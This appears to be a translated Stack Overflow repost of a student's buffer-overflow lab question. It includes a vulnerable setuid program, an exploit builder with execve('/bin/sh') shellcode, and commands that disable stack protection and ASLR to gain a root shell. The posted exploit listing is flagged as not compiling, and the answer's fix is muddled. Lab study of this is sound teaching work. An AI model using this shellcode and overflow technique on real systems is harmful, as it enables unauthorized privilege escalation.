
c - 缓冲区溢出漏洞实验室问题

转载 作者:太空宇宙 更新时间:2023-11-04 02:58:23 25 4

我有一个实验室作业,但是卡住了。基本上,我必须利用缓冲区溢出来获得一个具有 root 权限的 shell。我必须使用 2 个单独的 .c 文件。这是第一个:stack.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/*
 * The lab's deliberately vulnerable function.
 *
 * str: input read from "badfile" by main(); treated as a C string.
 * Returns 1 unconditionally.
 *
 * strcpy() copies until it finds a NUL and never consults the size of the
 * destination, so any input longer than 11 bytes plus the terminator writes
 * past buffer[] into whatever the compiler placed above it in this frame —
 * on the lab's 32-bit target that includes the saved return address, which
 * is what the second program on this page overwrites. The page's build line
 * compiles with -fno-stack-protector, so no canary detects the overwrite.
 * The bounded fix would be to pass the destination size, e.g.
 * snprintf(buffer, sizeof buffer, "%s", str); it is not applied here because
 * the overflow is the subject of the exercise.
 */
int bof(char *str)
{
char buffer[12];

//BO Vulnerability: unbounded copy into a 12-byte stack buffer
strcpy(buffer,str);

return 1;
}

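/*
 * Entry point of the lab target: reads up to 517 bytes from "badfile" in the
 * current directory and hands them to bof(). The exit status 1 is kept from
 * the original. In the lab the binary is installed setuid root (chmod 4755),
 * so everything done with the file contents happens with root privileges.
 *
 * Changes from the original: the fopen() and fread() results are checked, so
 * a missing or empty file is reported instead of passing NULL to fread() or
 * copying an uninitialized str[]. The file handle is also closed. The call
 * into bof() is left exactly as before: that is the exercise, not a defect of
 * main(). Note that fread() does not NUL-terminate, so str is only a proper
 * C string if the file itself contains a NUL byte.
 */
int main(int argc, char* argv[])
{
    char str[517];
    (void)argc;
    (void)argv;

    FILE *badfile = fopen("badfile", "r");
    if (badfile == NULL) {
        perror("badfile");
        return 1;
    }

    /* Short reads are fine (the file may be smaller than 517 bytes);
       a zero-length read leaves str uninitialized, so reject it. */
    size_t n = fread(str, sizeof(char), 517, badfile);
    fclose(badfile);
    if (n == 0) {
        fprintf(stderr, "badfile: empty or unreadable\n");
        return 1;
    }

    bof(str);

    printf("Returned Properly\n");
    return 1;
}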

这是第二个:exploit.c

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
/* Payload bytes the lab expects the student to place into "badfile".
   The per-line comments are the lab's own annotation of each instruction.
   The mnemonics (movl %esp, int $0x80) are 32-bit x86 Linux, so the bytes
   are only meaningful for a 32-bit build of the target. sizeof(shellcode)
   counts the string literal's trailing NUL as well. */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */
;
/* Lab skeleton: writes a 517-byte file named "badfile" in the current
   directory consisting entirely of 0x90 bytes. The comment in the middle
   marks where the exercise expects the student to build the real contents.
   NOTE(review): `void main` is not a standard signature for a hosted
   program (int main is); fopen() is unchecked, so a NULL from it would be
   passed straight to fwrite(). argc/argv are unused. */
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
/* Initialize buffer with 0x90 (NOP instruction) */
memset(&buffer, 0x90, 517);   /* &buffer has type char (*)[517] but the same address, so memset() gets the intended pointer */
/* You need to fill the buffer with appropriate contents here */
/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");   /* NOTE(review): result not checked before use */
fwrite(buffer, 517, 1, badfile);
fclose(badfile);
}

我只能修改第二个。以下是我所做的更改:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_OFFSET 350

/* Same payload as in the first listing; the per-line comments are the lab's
   own annotation of each instruction. The mnemonics are 32-bit x86 Linux
   (movl %esp, int $0x80), so this only applies to a 32-bit build.
   NOTE(review): as transcribed here the initializer is not terminated with
   ';' the way the first listing's is. */
char shellcode[]=
"\x31\xc0" /* xorl %eax,%eax */
"\x50" /* pushl %eax */
"\x68""//sh" /* pushl $0x68732f2f */
"\x68""/bin" /* pushl $0x6e69622f */
"\x89\xe3" /* movl %esp,%ebx */
"\x50" /* pushl %eax */
"\x53" /* pushl %ebx */
"\x89\xe1" /* movl %esp,%ecx */
"\x99" /* cdql */
"\xb0\x0b" /* movb $0x0b,%al */
"\xcd\x80" /* int $0x80 */

/* Reads the current stack pointer of the calling program.
   NOTE(review): there is no return statement; the code presumably relies on
   the inline asm having left %esp in %eax, the register a 32-bit build uses
   for the return value. Reaching the end of a non-void function and then
   using its value is undefined behaviour in C, and "movl %esp" only
   assembles for 32-bit x86. */
unsigned long get_sp(void)
{
__asm__("movl %esp,%eax");
}

/* Builds "badfile" for the lab target: a 517-byte image that is 0x90 filler
   except for a repeated 4-byte value in its first 300 bytes, the shellcode[]
   bytes starting at offset 486, and a NUL as the final byte. An optional
   first command-line argument replaces DEFAULT_OFFSET.
   NOTE(review): `void main` is not a standard signature (int main is). */
void main(int argc, char **argv)
{
char buffer[517];
FILE *badfile;
char *ptr;
long *a_ptr,ret;

int offset = DEFAULT_OFFSET;
int codeSize = sizeof(shellcode);   /* includes the string literal's trailing NUL */
int buffSize = sizeof(buffer);

if(argc > 1) offset = atoi(argv[1]); //allows for command line input; atoi() reports no parse error (strtol() would)

ptr=buffer;
a_ptr = (long *) ptr;   /* NOTE(review): redundant — both are assigned again below before first use */

/* Initialize buffer with 0x90 (NOP instruction) */
memset(buffer, 0x90, buffSize);

/* ---------------------- BEGIN FILL BUFFER ---------------------- */
/* (The original marker comments here and at END ended in a backslash, which
   in C splices the next line into the comment; harmless only because the
   next line was blank.) */

ret = get_sp()+offset;
printf("Return Address: 0x%x\n",get_sp());   /* NOTE(review): %x expects unsigned int; get_sp() returns unsigned long (%lx) */
printf("Address: 0x%x\n",ret);               /* NOTE(review): same mismatch for the long ret (%lx) */

ptr = buffer;
a_ptr = (long *) ptr;

int i;
/* Stores one long per iteration while i advances 4 bytes at a time, so this
   presumably assumes sizeof(long) == 4, as on the 32-bit build the rest of
   the file targets. On an LP64 build the loop would store 600 bytes into the
   517-byte buffer and overrun the program's own stack. */
for (i = 0; i < 300;i+=4)
{
*(a_ptr++) = ret;
}

/* Copies codeSize bytes of shellcode[] to buffer[486..486+codeSize). */
for(i = 486;i < codeSize + 486;++i)
{
buffer[i] = shellcode[i-486];
{   /* NOTE(review): this line is '{' in the listing as shown, so the for loop above is never closed and the listing does not compile as transcribed. */
buffer[buffSize - 1] = '\0';   /* final byte is NUL so the target's fread()-filled str[517] ends as a C string */
/* ----------------------- END FILL BUFFER ----------------------- */


/* Save the contents to the file "badfile" */
badfile = fopen("./badfile", "w");   /* NOTE(review): unchecked; a NULL here is passed straight to fwrite() */
fwrite(buffer,517,1,badfile);
fclose(badfile);
}

然后我从命令行执行了以下命令

$ su root
$ Password (enter root password)
# gcc -o stack -fno-stack-protector stack.c
# chmod 4755 stack
# exit
$ gcc -o exploit exploit.c
$./exploit
$./stack

然而,虽然它确实生成了包含实际数据的 badfile,并且也弹出了一个 shell,但该 shell 只有普通用户权限。此前,我确实以 root 身份执行了以下命令:

echo 0 > /proc/sys/kernel/randomize_va_space

实验手册说我需要以 root 身份执行以下命令:

sysctl -w kernel.randomize_va_space=0

但是,如果我这样做,那么在执行 stack 时就会得到“非法指令”(Illegal instruction)错误。有人能帮我解决这个问题吗?

最佳答案

我找到了问题所在。我必须把 zsh 链接到 /bin/bash/。我之前跳过了这一步,因为我以为只有在使用 Fedora 时才需要这样做,而我用的是 Ubuntu。

关于c - 缓冲区溢出漏洞实验室问题,我们在Stack Overflow上找到一个类似的问题: https://stackoverflow.com/questions/14916004/
